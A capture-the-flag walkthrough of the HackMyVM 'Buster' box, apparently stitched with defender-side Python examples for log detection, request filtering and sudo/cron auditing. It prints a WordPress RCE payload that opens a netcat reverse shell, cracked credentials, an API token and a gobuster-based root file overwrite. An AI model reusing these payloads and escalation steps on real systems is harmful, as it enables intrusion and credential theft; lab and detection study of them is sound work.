Lookthrough for HackMyVM_Buster

HackMyVM_Buster

The network adapter on this box was broken again.
Once it was configured, run an nmap scan:

┌──(root㉿kali)-[/usr/share/wordlists/metasploit]
└─# nmap 192.168.64.6
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-18 01:44 EST
Nmap scan report for 192.168.64.6
Host is up (0.00068s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: CE:5E:DA:EA:E4:33 (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 13.27 seconds

Port 80 turns out to be WordPress.
Run wpscan over it. Something I learned here: a free API token from the WPScan site lets the scan query the vulnerability database:

┌──(root㉿kali)-[/usr/share/wordlists/metasploit]
└─# wpscan --url http://192.168.64.6/ -e vp,u --api-token wfO2qNYqlam4QGql4RFJXIXG0oohePz5k7kSpRbXxfI
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
Version 3.8.27
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.64.6/ [192.168.64.6]
[+] Started: Tue Feb 18 01:44:10 2025

Interesting Finding(s):

[+] Headers
| Interesting Entry: Server: nginx/1.14.2
| Found By: Headers (Passive Detection)
| Confidence: 100%

[+] robots.txt found: http://192.168.64.6/robots.txt
| Interesting Entries:
| - /wp-admin/
| - /wp-admin/admin-ajax.php
| Found By: Robots Txt (Aggressive Detection)
| Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.64.6/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.64.6/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.64.6/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 6.7.1 identified (Outdated, released on 2024-11-21).
| Found By: Meta Generator (Passive Detection)
| - http://192.168.64.6/, Match: 'WordPress 6.7.1'
| Confirmed By: Rss Generator (Aggressive Detection)
| - http://192.168.64.6/feed/, <generator>https://wordpress.org/?v=6.7.1</generator>
| - http://192.168.64.6/comments/feed/, <generator>https://wordpress.org/?v=6.7.1</generator>

[i] The main theme could not be detected.

[+] Enumerating Vulnerable Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] ta0
| Found By: Wp Json Api (Aggressive Detection)
| - http://192.168.64.6/wp-json/wp/v2/users/?per_page=100&page=1
| Confirmed By:
| Rss Generator (Aggressive Detection)
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)

[+] welcome
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)

[+] WPScan DB API OK
| Plan: free
| Requests Done (during the scan): 1
| Requests Remaining: 24

[+] Finished: Tue Feb 18 01:44:13 2025
[+] Requests Done: 17
[+] Cached Requests: 42
[+] Data Sent: 4.404 KB
[+] Data Received: 56.764 KB
[+] Memory used: 216.934 MB
[+] Elapsed time: 00:00:03

Two user accounts, ta0 and welcome, but brute-forcing either didn't seem to get anywhere.
Another thing learned: the wpscan plugin scan needs to be more thorough:

wpscan --url http://192.168.64.6/ -e ap --plugins-detection --api-token wfO2qNYqlam4QGql4RFJXIXG0oohePz5k7kSpRbXxfI

The scan seemed rather slow; next time I really need to give the Kali VM more memory and CPUs.
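The wpscan runs above touched readme.html, xmlrpc.php, the REST users endpoint, sequential author IDs and plugin paths, and every one of those requests lands in the web server's access log. As an added example from the defender's side (not part of this writeup, not WPScan's code), here is a small Python detector that tags those patterns per client IP in nginx combined-format log lines. The log lines are constructed for the example, and the per-IP thresholds are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# nginx "combined" format:
# ip - user [time] "METHOD target HTTP/x" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample log (not from the target box). It mirrors the probes a
# wpscan run makes: readme/xmlrpc checks, REST user listing, author-id
# probing, and a burst of 404s under /wp-content/plugins/.
UA = "WPScan v3.8.27 (https://wpscan.com/wordpress-security-scanner)"
SAMPLE_LOG = "\n".join([
    f'10.0.0.9 - - [18/Feb/2025:01:44:10 -0500] "GET / HTTP/1.1" 200 5120 "-" "{UA}"',
    f'10.0.0.9 - - [18/Feb/2025:01:44:10 -0500] "GET /readme.html HTTP/1.1" 200 7401 "-" "{UA}"',
    f'10.0.0.9 - - [18/Feb/2025:01:44:11 -0500] "GET /xmlrpc.php HTTP/1.1" 405 42 "-" "{UA}"',
    f'10.0.0.9 - - [18/Feb/2025:01:44:11 -0500] "GET /wp-json/wp/v2/users/?per_page=100&page=1 HTTP/1.1" 200 812 "-" "{UA}"',
    f'10.0.0.9 - - [18/Feb/2025:01:44:12 -0500] "GET /?author=1 HTTP/1.1" 301 0 "-" "{UA}"',
    f'10.0.0.9 - - [18/Feb/2025:01:44:12 -0500] "GET /?author=2 HTTP/1.1" 301 0 "-" "{UA}"',
    f'10.0.0.9 - - [18/Feb/2025:01:44:12 -0500] "GET /?author=3 HTTP/1.1" 404 0 "-" "{UA}"',
    '10.0.0.9 - - [18/Feb/2025:01:44:13 -0500] "GET /wp-content/plugins/akismet/readme.txt HTTP/1.1" 404 153 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [18/Feb/2025:01:44:13 -0500] "GET /wp-content/plugins/jetpack/readme.txt HTTP/1.1" 404 153 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [18/Feb/2025:01:44:13 -0500] "GET /wp-content/plugins/contact-form-7/readme.txt HTTP/1.1" 404 153 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [18/Feb/2025:01:44:13 -0500] "GET /wp-content/plugins/woocommerce/readme.txt HTTP/1.1" 404 153 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [18/Feb/2025:01:44:13 -0500] "GET /wp-content/plugins/wordpress-seo/readme.txt HTTP/1.1" 404 153 "-" "Mozilla/5.0"',
    '10.0.0.23 - - [18/Feb/2025:01:45:02 -0500] "GET /2025/02/hello-world/ HTTP/1.1" 200 9100 "-" "Mozilla/5.0"',
])

# Thresholds are assumptions; tune them to the site's normal traffic.
AUTHOR_PROBE_THRESHOLD = 3   # distinct ?author=N requests from one client
PLUGIN_404_THRESHOLD = 5     # 404s under /wp-content/plugins/ from one client


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    url = urlsplit(rec["target"])
    rec["path"] = url.path
    rec["query"] = parse_qs(url.query)
    rec["status"] = int(rec["status"])
    return rec


def analyze(lines):
    """Return {client_ip: sorted finding tags} for the given access-log lines."""
    findings = defaultdict(set)
    author_probes = defaultdict(int)
    plugin_404s = defaultdict(int)
    for raw in lines:
        rec = parse_line(raw.strip())
        if rec is None:
            continue
        ip, path = rec["ip"], rec["path"]
        if "wpscan" in rec["ua"].lower():
            findings[ip].add("scanner-user-agent")
        if path.startswith("/wp-json/wp/v2/users"):
            findings[ip].add("rest-user-enumeration")
        if path == "/xmlrpc.php":
            findings[ip].add("xmlrpc-probe")
        if path == "/readme.html":
            findings[ip].add("version-fingerprint")
        if "author" in rec["query"]:
            author_probes[ip] += 1
            if author_probes[ip] >= AUTHOR_PROBE_THRESHOLD:
                findings[ip].add("author-id-bruteforce")
        if path.startswith("/wp-content/plugins/") and rec["status"] == 404:
            plugin_404s[ip] += 1
            if plugin_404s[ip] >= PLUGIN_404_THRESHOLD:
                findings[ip].add("plugin-enumeration")
    return {ip: sorted(tags) for ip, tags in findings.items()}


if __name__ == "__main__":
    for ip, tags in analyze(SAMPLE_LOG.splitlines()).items():
        print(ip, ", ".join(tags))
```

The user-agent tag is the weakest signal, since it is trivially changed; the path-based tags are the ones worth alerting on. The same findings also point at the hardening that removes the signal: disable xmlrpc.php if nothing uses it, restrict the REST users endpoint to authenticated requests, and delete readme.html so the version is not advertised.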

[!] 1 vulnerability identified:
|
| [!] Title: WP Query Console <= 1.0 - Unauthenticated Remote Code Execution
| References:
| - https://wpscan.com/vulnerability/f911568d-5f79-49b7-8ce4-fa0da3183214
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-50498
| - https://www.wordfence.com/threat-intel/vulnerabilities/id/ae07ca12-e827-43f9-8cbb-275b9abbd4c3
|

So there is a WP Query Console vulnerability.
See the exploit here (GitHub).

It executes arbitrary PHP; some system functions are blocked, but not all of them:
{"queryArgs":"shell_exec('nc -e /bin/bash 192.168.64.2 1234');","queryType":"post"}
That pops a reverse shell straight away; upgrade the shell while you're at it.
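The payload above works because queryArgs is handed to PHP as code and the plugin's own function denylist is incomplete. As an added example (neither the plugin's code nor the writeup's), here is a request-body check of the kind a reverse proxy or WAF rule could apply in front of the plugin's endpoint; the endpoint path is not assumed here, the function list and the `;`/`$` heuristic are assumptions, and the sample bodies are constructed. The actual fix is removing the plugin: a denylist in front of an eval can only narrow the problem the writeup describes, never close it.

```python
import json
import re

# PHP primitives that run commands or evaluate code. Assumed list for this
# example; the point is that a WP_Query argument array never needs any of them.
EXEC_FUNCTIONS = {
    "shell_exec", "exec", "system", "passthru", "popen", "proc_open",
    "eval", "assert", "call_user_func", "call_user_func_array",
}

# An optional namespace backslash, an identifier, optional whitespace, "(".
# PHP function names are case-insensitive, so the match is too.
CALL_RE = re.compile(r"\\?\b([A-Za-z_][A-Za-z0-9_]*)\s*\(", re.IGNORECASE)

# Constructed sample bodies (the malicious one stands in for the page's payload).
MALICIOUS_BODY = '{"queryArgs":"shell_exec(\'id\');","queryType":"post"}'
BENIGN_BODY = '{"queryArgs":"array(\'post_type\' => \'post\', \'posts_per_page\' => 5)","queryType":"post"}'


def inspect_query_console_body(raw_body):
    """Return the reasons a request should be rejected; an empty list means clean."""
    reasons = []
    try:
        body = json.loads(raw_body)
    except ValueError:
        return ["body is not JSON"]
    args = body.get("queryArgs") if isinstance(body, dict) else None
    if not isinstance(args, str):
        return ["queryArgs missing or not a string"]
    for name in CALL_RE.findall(args):
        if name.lower() in EXEC_FUNCTIONS:
            reasons.append(f"call to {name.lower()}()")
    # Heuristic (assumption): query arguments are data; statement separators
    # and variables mean the field is carrying code.
    if ";" in args or "$" in args:
        reasons.append("statement/variable syntax in queryArgs")
    return reasons


if __name__ == "__main__":
    for body in (MALICIOUS_BODY, BENIGN_BODY):
        print(body, "->", inspect_query_console_body(body) or "clean")
```

A rule like this belongs on the edge (nginx with a body-inspecting module, or a WAF), where it also produces a log line when it fires; that log entry is the detection, and the hit count per source is what to alert on.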

Reading wp-config.php gives the MySQL credentials ll104567:thehandsomeguy.
Log in with mysql -u ll104567 -p and run:

use wordpress;
show tables;
select * from wp_users;

That gives the password hashes for ta0 and welcome; run john against them with rockyou:
ta0:$P$BDDc71nM67DbOVN/U50WFGII6EF6.r.
welcome:$P$BtP9ZghJTwDfSn1gKKc.k3mq4Vo.Ko/

┌──(root㉿kali)-[/tmp]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 1 password hash (phpass [phpass ($P$ or $H$) 128/128 ASIMD 4x2])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
104567 (?)
1g 0:00:00:36 DONE (2025-02-18 02:21) 0.02724g/s 20200p/s 20200c/s 20200C/s 112233669..085356
Use the "--show --format=phpass" options to display all of the cracked passwords reliably
Session completed.

welcome's password cracks to 104567; ta0's doesn't crack.
SSH in as welcome and grab the user flag:

welcome@listen:~$ sudo -l
Matching Defaults entries for welcome on listen:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User welcome may run the following commands on listen:
(ALL) NOPASSWD: /usr/bin/gobuster

sudo -l shows gobuster can be run as root.
Learned something again here (
First pull down pspy64 and look at the scheduled tasks:
2025/02/18 02:50:01 CMD: UID=0 PID=1304 | /bin/sh -c /bin/bash /opt/.test.sh
There is a /opt/.test.sh run by root. gobuster -o can write to a file, so overwriting that .test.sh should do it.

Overwrite procedure:
First, the attacking machine must actually have the matching path. For example, if I start a Python HTTP server in ~ and want the output (say /tmp/b) written into /opt/.test.sh, I need to mkdir tmp; cd tmp; touch b so that there is a path gobuster can reach. Meanwhile, echo 'tmp/b' > a.txt is done on the target host, because gobuster prepends a / to each wordlist entry.

sudo gobuster -w a.txt -u http://192.168.64.2:8000/ -n -q -o /opt/.test.sh

ls shows the size of /opt/.test.sh did indeed change.
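Both halves of this privilege escalation are auditable on the host: the sudo rule hands welcome an unrestricted root gobuster, and a root cron job runs a script whose contents can change underneath it. As an added defensive example (not from the writeup), the Python below parses sudo -l output for NOPASSWD rules with no pinned arguments, and baselines and re-checks a cron-run script for content and permission changes. The sudo -l text is a copy of the one shown above, the script and its overwrite are simulated in a temporary directory, and the heuristics are assumptions.

```python
import hashlib
import os
import re
import stat
import tempfile

# --- 1. sudo rule audit ----------------------------------------------------
# Copy of the `sudo -l` output shown above (used as constructed input here).
SUDO_L_OUTPUT = """\
Matching Defaults entries for welcome on listen:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User welcome may run the following commands on listen:
    (ALL) NOPASSWD: /usr/bin/gobuster
"""

# "(runas) TAG: TAG: command args" as printed by sudo -l
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*)$")


def risky_sudo_rules(text):
    """Return (binary, runas, problems) for each rule worth reviewing.

    Heuristics (assumptions for this example): NOPASSWD drops the password
    check, and a command listed without arguments lets the caller pick every
    flag, so any option that writes a file (gobuster -o above) becomes a root
    file write.
    """
    findings = []
    in_cmds = False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_cmds = True
            continue
        m = RULE_RE.match(line) if in_cmds else None
        if not m:
            continue
        cmd = m.group("cmd").strip()
        binary = cmd.split()[0]
        problems = []
        if "NOPASSWD" in m.group("tags"):
            problems.append("no password required")
        if cmd == binary:
            problems.append("arguments unrestricted")
        if problems:
            findings.append((binary, m.group("runas").strip(), problems))
    return findings


# --- 2. cron-run script integrity -----------------------------------------
def script_problems(path, baseline_sha256):
    """Compare a root-cron script against a known-good hash, mode and owner."""
    with open(path, "rb") as f:
        digest = hashlib.sha256(f.read()).hexdigest()
    st = os.stat(path)
    problems = []
    if digest != baseline_sha256:
        problems.append("content changed since baseline")
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        problems.append("group/world writable")
    if st.st_uid != 0:
        problems.append("not owned by root")
    return problems


def demo_integrity():
    """Simulate the writeup's overwrite in a temp dir; returns (before, after)."""
    with tempfile.TemporaryDirectory() as d:
        script = os.path.join(d, ".test.sh")
        with open(script, "w") as f:
            f.write("#!/bin/bash\necho maintenance\n")
        os.chmod(script, 0o700)
        with open(script, "rb") as f:
            baseline = hashlib.sha256(f.read()).hexdigest()
        before = script_problems(script, baseline)
        # A tool's output-file option truncating the script with its own
        # output (constructed stand-in for what the writeup describes).
        with open(script, "w") as f:
            f.write("/tmp/b (Status: 200)\n")
        after = script_problems(script, baseline)
    return before, after


if __name__ == "__main__":
    for binary, runas, problems in risky_sudo_rules(SUDO_L_OUTPUT):
        print(f"sudo rule {binary} as {runas}: {', '.join(problems)}")
    print("cron script before/after:", demo_integrity())
```

The hash check catches the overwrite regardless of which tool did it, which is the point: the cron job trusts a file, so the file's integrity is what to monitor. The sudo audit catches the root cause earlier; a rule that pins the full command line (or does not exist at all) is the fix.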

But for whatever reason, after the overwrite the shell just wouldn't come back???


http://example.com/2025/02/18/HackMyVM_Buster/
Author: Jednersaous
Published: 2025-02-18